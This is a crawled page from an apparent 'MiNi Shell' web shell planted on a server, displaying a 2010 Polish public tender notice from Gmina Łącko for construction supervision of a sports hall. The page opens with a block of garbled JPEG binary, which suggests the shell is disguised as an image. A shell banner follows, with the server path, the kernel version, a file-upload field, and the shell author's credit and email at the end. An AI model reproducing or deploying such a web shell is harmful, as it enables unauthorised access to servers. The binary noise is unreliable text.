JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100917/297272-N-2010.html

<p class="kh_header"><b>Łącko: Pełnienie  nadzoru Inwestorskiego nad  robotami związanymi z realizacją  zadania  pn:
BUDOWA  HALI WIDOWISKOWO-SPORTOWEJ  W  ŁĄCKU  -  ETAP  I</b><br>
<b>Numer ogłoszenia: 297272 - 2010; data zamieszczenia: 17.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Gminy , Łącko 445, 33-390 Łącko, woj. małopolskie, tel. 018 4140710, faks 018 4140740.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lacko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie  nadzoru Inwestorskiego nad  robotami związanymi z realizacją  zadania  pn:
BUDOWA  HALI WIDOWISKOWO-SPORTOWEJ  W  ŁĄCKU  -  ETAP  I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie  nadzoru inwestorskiego :  

Branża  konstrukcyjno - budowlana , drogowa 
- wykonanie robót  rozbiórkowych, ziemnych
- wykonanie fundamentów, ścian , stropów, dachu
- wykonanie  stolarki okiennej i drzwiowej, ślusarki
- wykonanie tynków, posadzek, elewacji robót wykończeniowych
-drogi, chodniki, parking
-zagospodarowanie terenu

Branża  instalacyjna  w  zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych
- wykonanie  instalacji sanitarnej  wod. kan i c.o., wentylacji mechanicznej, kotłowni 
  opadowej, drenażu ,przyłącza wod-kan,deszczowa 

Branża  instalacyjna  w  zakresie sieci, instalacji i urządzeń elektrycznych,

-  wykonanie robót  w zakresie  branży  elektrycznej  

Szczegółowy zakres obowiązków i uprawnień inspektora określają obowiązujące przepisy ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst  jedn.Dz. U. Nr  156/2006 poz.1118 z póżn. zm.) oraz niniejsza umowa, a w szczególności Wykonawca jest zobowiązany do wykonywania czynności:

1)	reprezentowania Urzędu Gminy  przed   Wykonawcą   oraz   innymi   podmiotami   uczestniczącym   w   procesie 
       inwestycyjnym związanym z robotami realizowanymi przez Wykonawcę,
2)	współpracy z nadzorem autorskim,
3)	wydawania poleceń wyłącznie na piśmie,
4)	zapewnienia pełnej obsługi sprawdzającej (geodezyjnej, rozliczeniowej, itp.),
5)	współpracy i koordynacji z osobami sprawującymi nadzór nad robotami branżowymi innych zadań realizowanych 
                równolegle,
6)	przygotowania świadectw wykonania i przejęcia,
7)	wypełniania obowiązków określonych dla Inspektora Koordynatora i inspektorów nadzoru w umowie zawartej 
       pomiędzy  Urzędem Gminy a Wykonawcą robót,
8)	uczestniczenia przy przekazywaniu Wykonawcy terenu budowy na każdym etapie realizowanych robót,
9)	pobytu  na budowie  cztery  razy  w tygodniu minimum  po  2  godziny  przez okres realizacji robót przez Wykonawcę 
       robót - dotyczy  to  inspektora  branży  konstrukcyjno budowlanej jako KOORDYNATORA , oraz  na  każde  
       wezwanie   Zamawiającego lub Wykonawcy robót  potwierdzone  wpisem do książki pobytów natomiast inspektorzy 
       pozostałych branży pobyt  na budowie  trzy  razy  w  tygodniu oraz  na  każde  wezwanie  Zamawiającego lub 
      Wykonawcy  robót  potwierdzone  wpisem do książki pobytów 
10)	rozwiązywania bieżących problemów technicznych w trakcie realizacji robót przez Wykonawcę,
11)	opiniowania szczegółowych harmonogramów robót w terminie 7 dni od daty ich przekazania,
12)	monitorowania postępu robót realizowanych przez Wykonawcę,
13)	kontrolowania przed rozpoczęciem każdego etapu robót, czy  roboty budowlane zorganizowane zostały z uwzględnieniem wymogów bezpieczeństwa i ochrony zdrowia,
14)	kontrolowania stanu zabezpieczenia przeciwpożarowego terenu budowy oraz utrzymania ogólnego porządku na 
           tym terenie,
15)	zapewnienia, przestrzegania obowiązujących przepisów ochrony środowiska w czasie budowy i po wykonaniu 
       obiektów stałych,
16)	weryfikowania i zatwierdzania rysunków roboczych sporządzanych przez Wykonawcę,
17)	weryfikowania i zatwierdzania rysunków zamiennych i uzupełniających wykonanych przez nadzór autorski,
18)	opracowywania wniosków dot. wykonania robót zamiennych oraz przedstawiania ich do akceptacji Gminie,
19)	zatwierdzania, w uzgodnieniu z Urzędem Gminy , wzorów druków protokołów komisyjnego pobierania próbek do 
       badań laboratoryjnych oraz wzorów druków badań laboratoryjnych,
20)	weryfikowania i zatwierdzenia atestów i receptur przedstawianych przez Wykonawcę,
21)	sprawdzania zastosowanych materiałów przed ich wbudowaniem, w zakresie dopuszczenia ich do stosowania w 
       budownictwie,
22)	czuwania nad jakością wykonywanych robót, w tym prowadzenia kontrolnych badań laboratoryjnych,
23)	uczestniczenia w pobieraniu próbek oraz zatwierdzania pozytywnych wyników wykonywanych badań,
24)	wydawania poleceń w zakresie usuwania defektów robót wykonanych przez Wykonawcę niewłaściwie lub poniżej 
       obowiązujących standardów,
25)kontroli jakości realizowanych robót w zakresie zgodności z dokumentacją projektową, normami i specyfikacjami   
       technicznymi,
26)	dokonywania odbiorów robót zanikających i ulęgających zakryciu,
27)	inspektor  KOORDYNATOR dokonywania niezwłocznej rejestracji kolejnych tomów dziennika budowy,
28)	przygotowywania dla Urzędu  Gminy okresowych sprawozdań (co najmniej raz w miesiącu) zawierających 
       informacje dotyczące ilości i zakresu realizowanych robót, w formie uzgodnionej z  Urzędem  Gminy,
29)	inspektor  KOORDYNATOR przygotowania sprawozdań i innych danych niezbędnych do sporządzenia dokumentacji 
       których obowiązek wykonania wynika z zawartej przez Gminę  umowy o dofinansowanie inwestycji w ramach 
       Małopolskiego  Regionalnego  Programu Operacyjnego na lata 2007-2013,
30)	wystawiania miesięcznych i kwartalnych raportów o postępach robót realizowanych przez Wykonawcę ( pisemnie
       i formie elektronicznej),
31)	uczestniczenia w zwoływanych przez  Gminę czy Wykonawcę spotkaniach dotyczących realizowanych przez 
       Wykonawcę robót z udziałem inspektorów branżowych, a także sporządzenia protokołów z tych spotkań,
32)	weryfikowania rysunków powykonawczych dostarczanych przez Wykonawcę,
33)	weryfikowania robót zinwentaryzowanych na geodezyjnych mapach powykonawczych,
34)	sprawdzenie dokumentów wymaganych do zgłoszenia zakończenia budowy do organu nadzoru budowlanego 
       przygotowanych przez   Wykonawcę  robót,
35)	organizowania i przeprowadzenia odbiorów częściowych, w szczególności podejmowania wszelkich niezbędnych 
       czynności koniecznych do przeprowadzenia odbiorów,
36)	rozliczania wykonanych robót pod względem rzeczowym i finansowym (w tym zatwierdzania faktur w terminie 3 dni 
       od daty ich przedłożenia przez Wykonawcę),
37)	uczestniczenia w przeglądach gwarancyjnych i odbiorze ostatecznym,
38)	sporządzania   wniosków  o   naliczenie   kar  umownych   wraz  z   dokumentami   uzasadniającymi   ich naliczenie,
         39)dostarczania na żądanie i terminach wskazanych przez  Gminę dokumentów i informacji dot. realizowanych robót,
        40)inspektor  KOORDYNATOR przygotowywania danych, na właściwych dla programu formularzach w zakresie:
        - wnioskowanie Beneficjanta o płatności,
        -okresowe i końcowe sprawozdania z realizacji  Projektu.
41) inspektor  KOORDYNATOR prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych z 
       określeniem  dat wykonywanych  zdjęć 

Szczegółowy opis i zakres robót określają Szczegółowe Specyfikacje Techniczne (SST), dokumentacja projektowa i przedmiar  robót   dostępne  są na stronie  www.lacko.pl  przetargi w BIP  
W interesie Wykonawcy pozostaje zdobycie wszelkich niezbędnych informacji koniecznych do przygotowania i złożenia oferty.
Inspektor nadzoru we własnym zakresie i w ramach wynagrodzenia zapewni:
-transport na potrzeby własne na placu budowy, oraz dojazdy do placu budowy,
-niezbędny sprzęt oraz wyposażenie na potrzeby własne na terenie budowy,
-środki łączności z Zamawiającym (telefon, faks, Internet).
Inspektor nadzoru inwestorskiego branży konstrukcyjno-budowlanej (inspektor koordynator) pełnić będzie nadzór i 
kontrolę nad inspektorami branżowymi,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dla przedmiotu zamówienia analogicznego określonego w pkt.II.1.3 i zakresu do 50% wartości zamówienia  podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w tym zakresie  szczególnych  wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą że   w okresie ostatnich trzech lat przed upływem terminu składania  ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie , zrealizowali lub realizują: co najmniej   jeden  nadzór  inwestorski  przy  budowie  sali gimnastycznej .
     Na potwierdzenie  warunku  Wykonawca złoży zał. nr 7  SIWZ Wykaz usług wraz z załączeniem  dokumentu   potwierdzającego , że usługi  zostały lub są   wykonywane  należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w tym zakresie  szczególnych  wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą  że dysponują : inspektorem nadzoru posiadającym uprawnienia budowlane bez ograniczeń w specjalności : 
        a) konstrukcyjno - budowlanej,
        b) instalacyjnej w  zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych
        c) instalacyjnej w  zakresie sieci, instalacji , urządzeń elektrycznych ,
 oraz aktualny wpis do właściwej organizacji  samorządu  zawodowego potwierdzony zaświadczeniem z  określonym terminem ważności 
       Na potwierdzenie  warunku  Wykonawca złoży zał. nr  5  SIWZ Wykaz osób oraz oświadczenie o uprawnieniach   
       -że wymieniona osoba posiada  odpowiednie uprawnienia  zał. nr  6 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w tym zakresie  szczególnych  wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień  umowy może być dokonana w przypadku zmian nieistotnych w stosunku do treści oferty , na podstawie której dokonano wyboru wykonawcy  lub  okoliczności, których nie można było przewidzieć w chwili zawarcia    umowy a w szczególności : 
       - zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy,
      - wprowadzone zostały dodatkowe wymagania dla inwestycji współfinansowanych z funduszy UE
      - wydłużenia terminu wykonania zamówienia z uwagi na wystąpienie nadzwyczajnych warunków pogodowych nie pozwalających na wykonanie zamówienia lub wystąpienia innych okoliczności niezależnych od Wykonawcy, pod warunkiem wyrażeniem zgody przez Zamawiającego. Termin może ulec przedłużeniu o czas trwania tych okoliczności,
    - nastąpił sprzeciw właścicieli terenu na prowadzenie prac przygotowawczych (pomiary geodezyjne, odkrywki    
        geologiczne itp.).
      - wystąpiły zamówienia dodatkowe niezbędne do prawidłowego wykonania zamówienia podstawowego, których 
        wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia  i które  mają wpływ 
        na termin realizacji zamówienia.
     -  z uwagi na niezależne od stron okoliczności (tj.choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne) dotyczące osób kluczowych dla realizacji umowy np. kierownik budowy , inspektor nadzoru itp. oraz osób reprezentujących strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lacko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łącko; 
33-390 Łącko 445 pok. 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2010 godzina 09:30, miejsce: Urząd Gminy Łącko
33-390 Łącko 445 pok. 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany  przez Unię Europejską  w ramach  Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Branża  konstrukcyjno - budowlana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - wykonanie robót  rozbiórkowych, ziemnych
- wykonanie fundamentów, ścian , stropów, dachu
- wykonanie  stolarki okiennej i drzwiowej, ślusarki
- wykonanie tynków, posadzek, elewacji robót wykończeniowych
-drogi, chodniki, parking
-zagospodarowanie terenu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2- branża instalacyjna  w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - wykonanie  instalacji sanitarnej  wod. kan i c.o., wentylacji mechanicznej, kotłowni 
  opadowej, drenażu ,przyłącza wod-kan,deszczowa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie nr 3 - branża w zakresie sieci, instalacji, urzadzeń elektrycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -  wykonanie robót  w zakresie  branży  elektrycznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com